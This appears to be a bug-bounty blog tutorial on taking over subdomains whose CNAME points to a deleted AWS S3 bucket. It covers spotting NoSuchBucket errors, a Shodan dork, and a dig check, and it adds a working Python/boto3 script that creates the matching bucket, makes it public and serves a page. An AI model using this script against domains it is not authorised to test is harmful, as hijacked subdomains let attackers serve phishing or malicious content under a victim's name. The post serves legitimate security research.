Blue Byte

AWS S3 Bucket Subdomain Takeover

Subdomain takeover is a domain hijacking technique. It occurs when a subdomain has a CNAME (Canonical Name, essentially an alias) record pointing at a resource hosted on a third-party service, such as GitHub Pages (in custom domain mode) or Amazon S3 (Simple Storage Service), and that resource has been deleted or was never claimed while the DNS record was left in place. Because the provider lets anyone register the unclaimed name, whoever creates it controls the content served under the victim's subdomain.

Who has never come across the iconic "bucket not found" (NoSuchBucket) page during recon when accessing a subdomain? It means the hostname still resolves to S3, but S3 has no bucket by that name to serve.


Additionally, the response header x-amz-error-code: NoSuchBucket is a good Shodan dork for finding hosts that answer with the S3 "bucket does not exist" error. A hit is only a lead, though: you still need to find the subdomain whose CNAME points at that bucket name before it is a takeover.

Using the dig utility, we can query the CNAME record and confirm that the subdomain points to a specific bucket. The target hostname encodes the bucket name and, for website endpoints, the region (the general form is bucket-name.s3-website-<region>.amazonaws.com), which is exactly the information needed for the next step.


In a bug bounty programme, a valid PoC normally requires actually performing the takeover: creating a publicly readable bucket with exactly the same name and serving content from it, since the mitigation consists of removing the dangling CNAME entry. Bucket names are globally unique, so if the name is free you can claim it; you will need an AWS account to do so. Pay attention to the region: S3 website endpoints are regional, so the bucket must be created in the region named in the CNAME target or the hostname will not serve it. Keep the PoC harmless (a plain page identifying the finding), never serve anything else from the hijacked name.


Then configure the bucket for static website hosting, make its objects publicly readable (new buckets have Block Public Access enabled by default, so it has to be lifted before a public bucket policy takes effect), and upload an index.html, which is what visitors of the subdomain will now see.
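The two steps above (reading the bucket and region out of the CNAME target, then claiming it with the right region, a public-read policy and website hosting) put together as an added example. This is my own code, not the author's; the hostname, HTTP response and bucket name in it are constructed samples, and the boto3 part only runs if you call claim_bucket() with real credentials.

```python
"""Added example: triage a CNAME -> S3 target and, optionally, claim it as a PoC."""
import json
import re
from typing import Optional

# Hostname shapes S3 hands out. Website endpoints always carry a region
# (s3-website-us-east-1 or s3-website.eu-west-2); REST endpoints may
# (s3.eu-west-1, legacy s3-eu-west-1) or may not (legacy global s3.amazonaws.com).
_S3_HOST = re.compile(
    r"^(?P<bucket>[a-z0-9][a-z0-9.-]{1,61}[a-z0-9])\."
    r"(?:s3-website[.-](?P<wregion>[a-z]{2}(?:-[a-z]+)+-\d)"
    r"|s3[.-](?P<rregion>[a-z]{2}(?:-[a-z]+)+-\d)"
    r"|s3)\.amazonaws\.com$"
)


def parse_s3_target(cname_target: str) -> Optional[dict]:
    """Bucket, region (None when the hostname does not encode one) and whether the
    target is a website endpoint; None when the CNAME does not point at S3.
    dig prints targets with a trailing dot, so it is stripped first."""
    m = _S3_HOST.match(cname_target.strip().rstrip(".").lower())
    if not m:
        return None
    return {"bucket": m["bucket"], "region": m["wregion"] or m["rregion"],
            "website": m["wregion"] is not None}


def is_dangling_s3(cname_target: str, status: int, headers: dict, body: str) -> bool:
    """Takeover candidate only when the CNAME points at S3 AND S3 itself reports
    NoSuchBucket. Other S3 errors (AccessDenied, AllAccessDisabled, PermanentRedirect)
    mean the bucket exists and belongs to someone."""
    if parse_s3_target(cname_target) is None or status != 404:
        return False
    hdrs = {k.lower(): v for k, v in headers.items()}
    # Website endpoints answer with HTML ("Code: NoSuchBucket"), REST endpoints with XML.
    return (hdrs.get("x-amz-error-code") == "NoSuchBucket"
            or re.search(r"(<Code>|Code: )NoSuchBucket", body) is not None)


def public_read_policy(bucket: str) -> dict:
    """Bucket policy granting anonymous read of objects (just enough for the PoC page)."""
    return {"Version": "2012-10-17",
            "Statement": [{"Sid": "TakeoverPoCPublicRead", "Effect": "Allow",
                           "Principal": "*", "Action": "s3:GetObject",
                           "Resource": f"arn:aws:s3:::{bucket}/*"}]}


def takeover_plan(cname_target: str, default_region: str = "us-east-1") -> Optional[dict]:
    """What to create so the dangling hostname serves our content. Website endpoints
    are regional, so their region is mandatory; the global REST endpoint does not
    encode one and default_region (an assumption, pick what suits you) is used."""
    t = parse_s3_target(cname_target)
    if t is None:
        return None
    return {"bucket": t["bucket"], "region": t["region"] or default_region,
            "website": t["website"], "policy": public_read_policy(t["bucket"])}


def claim_bucket(cname_target: str, index_html: str, session=None) -> dict:
    """Perform the PoC with boto3 (needs AWS credentials and network): create the bucket
    in the right region, lift the default Block Public Access, attach the read policy,
    enable website hosting where the target is a website endpoint, upload index.html."""
    import boto3  # imported lazily so the pure helpers above work without it
    plan = takeover_plan(cname_target)
    if plan is None:
        raise ValueError(f"{cname_target} is not an S3 hostname")
    s3 = (session or boto3.session.Session()).client("s3", region_name=plan["region"])
    kwargs = {"Bucket": plan["bucket"]}
    if plan["region"] != "us-east-1":  # us-east-1 rejects an explicit LocationConstraint
        kwargs["CreateBucketConfiguration"] = {"LocationConstraint": plan["region"]}
    s3.create_bucket(**kwargs)
    s3.delete_public_access_block(Bucket=plan["bucket"])
    s3.put_bucket_policy(Bucket=plan["bucket"], Policy=json.dumps(plan["policy"]))
    if plan["website"]:
        s3.put_bucket_website(Bucket=plan["bucket"],
                              WebsiteConfiguration={"IndexDocument": {"Suffix": "index.html"}})
    s3.put_object(Bucket=plan["bucket"], Key="index.html",
                  Body=index_html.encode(), ContentType="text/html")
    return plan


# Constructed recon data (not a real host): what dig and curl -i would have shown.
CONSTRUCTED_CNAME = "assets-bucket.s3-website-us-east-1.amazonaws.com."
CONSTRUCTED_RESPONSE = (
    404,
    {"x-amz-error-code": "NoSuchBucket",
     "x-amz-error-message": "The specified bucket does not exist",
     "Server": "AmazonS3"},
    "<html><body><h1>404 Not Found</h1><ul><li>Code: NoSuchBucket</li></ul></body></html>",
)

if __name__ == "__main__":
    status, headers, body = CONSTRUCTED_RESPONSE
    if is_dangling_s3(CONSTRUCTED_CNAME, status, headers, body):
        print(json.dumps(takeover_plan(CONSTRUCTED_CNAME), indent=2))
```

Feed it the CNAME target from dig and the status, headers and body from a curl -i against the subdomain; only when is_dangling_s3() returns True is the name worth claiming, and takeover_plan() tells you which region the bucket has to live in.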


Thanks for reading!
